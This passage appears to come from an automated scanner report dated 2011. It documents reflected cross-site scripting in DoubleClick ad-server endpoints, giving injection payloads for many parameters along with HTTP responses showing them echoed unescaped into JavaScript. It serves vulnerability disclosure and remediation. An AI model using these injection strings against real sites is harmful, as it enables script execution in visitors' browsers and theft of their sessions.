<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... ://ad.doubleclick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/o%3B239209705%3B0-0%3B0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=44035458360174204242d18"-alert(1)-"a23769c2b50&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797"); var fscUrl = url; var fscUrlClickTagFound = false; var wmod ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 519f1"-alert(1)-"cc5a0c33515 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6042
Date: Tue, 28 Jun 2011 02:25:53 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 3Bh%3Dv8/3b34/7/ab/%2a/v%3B239209730%3B0-0%3B0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488519f1"-alert(1)-"cc5a0c33515&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99772"-alert(1)-"2b722a970f9 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6042
Date: Tue, 28 Jun 2011 02:25:28 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... lick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/v%3B239209730%3B0-0%3B0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=11251499772"-alert(1)-"2b722a970f9&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88227"-alert(1)-"fcf0b6f9d7d was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6042
Date: Tue, 28 Jun 2011 02:26:19 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c30653088227"-alert(1)-"fcf0b6f9d7d&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var op ...[SNIP]...
1.25. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N6595.317091.MERKLEINC.COM/B5374569.5
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 613e3"-alert(1)-"21fa9330d9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6054
Date: Tue, 28 Jun 2011 02:27:04 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 1%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&613e3"-alert(1)-"21fa9330d9a=1http://www.geico.com/landingpage/go125.htm?soa=59796"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acb04"-alert(1)-"12c860f5038 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6042
Date: Tue, 28 Jun 2011 02:26:41 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 91%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=acb04"-alert(1)-"12c860f5038http://www.geico.com/landingpage/go125.htm?soa=59796"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8931a"-alert(1)-"96fd3dbaeee was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6042
Date: Tue, 28 Jun 2011 02:25:06 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ://ad.doubleclick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/v%3B239209730%3B0-0%3B0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=4675506593120912348931a"-alert(1)-"96fd3dbaeee&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796"); var fscUrl = url; var fscUrlClickTagFound = false; var wmod ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c69f3"-alert(1)-"17b445dd750 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6058
Date: Tue, 28 Jun 2011 02:23:51 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 3Bh%3Dv8/3b34/7/ab/%2a/s%3B239209737%3B0-0%3B0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488c69f3"-alert(1)-"17b445dd750&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5f09"-alert(1)-"61479ab10b3 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6058
Date: Tue, 28 Jun 2011 02:23:25 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... lick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/s%3B239209737%3B0-0%3B0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509a5f09"-alert(1)-"61479ab10b3&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 575a0"-alert(1)-"2dc14e7726b was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6058
Date: Tue, 28 Jun 2011 02:24:18 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530575a0"-alert(1)-"2dc14e7726b&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "always";
var o ...[SNIP]...
1.31. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N6595.317091.MERKLEINC.COM/B5374569.8
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d96da"-alert(1)-"f7095fb1d0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6070
Date: Tue, 28 Jun 2011 02:25:02 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 7%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&d96da"-alert(1)-"f7095fb1d0a=1http://www.geico.com/landingpage/go140.htm?soa=59798"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "always";
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efeba"-alert(1)-"38c0b17c448 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6058
Date: Tue, 28 Jun 2011 02:24:39 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 87%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=efeba"-alert(1)-"38c0b17c448http://www.geico.com/landingpage/go140.htm?soa=59798"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "always";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bba38"-alert(1)-"78ca1578dde was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6058
Date: Tue, 28 Jun 2011 02:23:04 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... ://ad.doubleclick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/s%3B239209737%3B0-0%3B0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489bba38"-alert(1)-"78ca1578dde&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798"); var fscUrl = url; var fscUrlClickTagFound = false; var wmod ...[SNIP]...
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be866'-alert(1)-'87c7a423e2e was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4593
Date: Tue, 28 Jun 2011 03:10:18 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... pe_300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950be866'-alert(1)-'87c7a423e2e&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6994%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744';
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3760b'-alert(1)-'d2e50412e43 was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4614
Date: Tue, 28 Jun 2011 03:11:29 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... dth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=172864053760b'-alert(1)-'d2e50412e43&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7003%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744'; var target = '_blank'; var dcbgco ...[SNIP]...
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fb80'-alert(1)-'3f118c0b305 was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4623
Date: Tue, 28 Jun 2011 03:11:06 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=173301083fb80'-alert(1)-'3f118c0b305&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6990%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744'; var target = '_blank' ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d52cb'-alert(1)-'412f1479ff2 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4602
Date: Tue, 28 Jun 2011 03:09:31 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... n.net/3126678/SLIM_Wipe_Maria_300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956d52cb'-alert(1)-'412f1479ff2&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6972%26avppid%3D653%26avpcid%3D3736%26 ...[SNIP]...
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db96c'-alert(1)-'befe711ab0a was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4614
Date: Tue, 28 Jun 2011 03:09:56 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 5050_KatieMike_300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488db96c'-alert(1)-'befe711ab0a&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7004%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26 ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3423'-alert(1)-'c547628938b was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4614
Date: Tue, 28 Jun 2011 03:09:08 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... s0.2mdn.net/3126678/SLIM_5050_KatieMike_300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944a3423'-alert(1)-'c547628938b&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D7004%26avppid%3D653%26avpcid ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb5b1'-alert(1)-'8ffdd34280f was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4608
Date: Tue, 28 Jun 2011 03:11:51 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... '; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956cb5b1'-alert(1)-'8ffdd34280f&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6954%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744'; var target = '_blank'; var dcbgcolor = '';
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42fa3'-alert(1)-'a131aad650a was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4602
Date: Tue, 28 Jun 2011 03:12:15 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... e = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=1733136542fa3'-alert(1)-'a131aad650a&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6972%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744'; var target = '_blank'; var dcbgcolor = ''; var dcswf = ' ...[SNIP]...
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f823e'-alert(1)-'1fb1ebda1f6 was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4614
Date: Tue, 28 Jun 2011 03:10:43 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 0.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683f823e'-alert(1)-'1fb1ebda1f6&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=http%3a%2f%2frts.alldayslim.com/p/fa760703%3Favpzid%3D1018%26avpmid%3D6971%26avppid%3D653%26avpcid%3D3736%26avpaid%3D337%26sid%3D744'; var targe ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 298a7'-alert(1)-'14caee42673 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4467
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:12:32 GMT
Expires: Tue, 28 Jun 2011 03:12:32 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... e'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=97167453-6c97-4c7b-b94f-9a7ce14497eb&_o=17282944&_eo=97956&_et=1309230488&_a=17328950&_s=11683&_d=17330108&_c=17286405&_pm=97956&_pn=17331365&redirect=298a7'-alert(1)-'14caee42673http://rts.alldayslim.com/p/fa760703?avpzid=1018&avpmid=6990&avppid=653&avpcid=3736&avpaid=337&sid=744'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/3126678/SLIM_Quiz_Spo ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67ac6'-alert(1)-'f3abb855eac was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
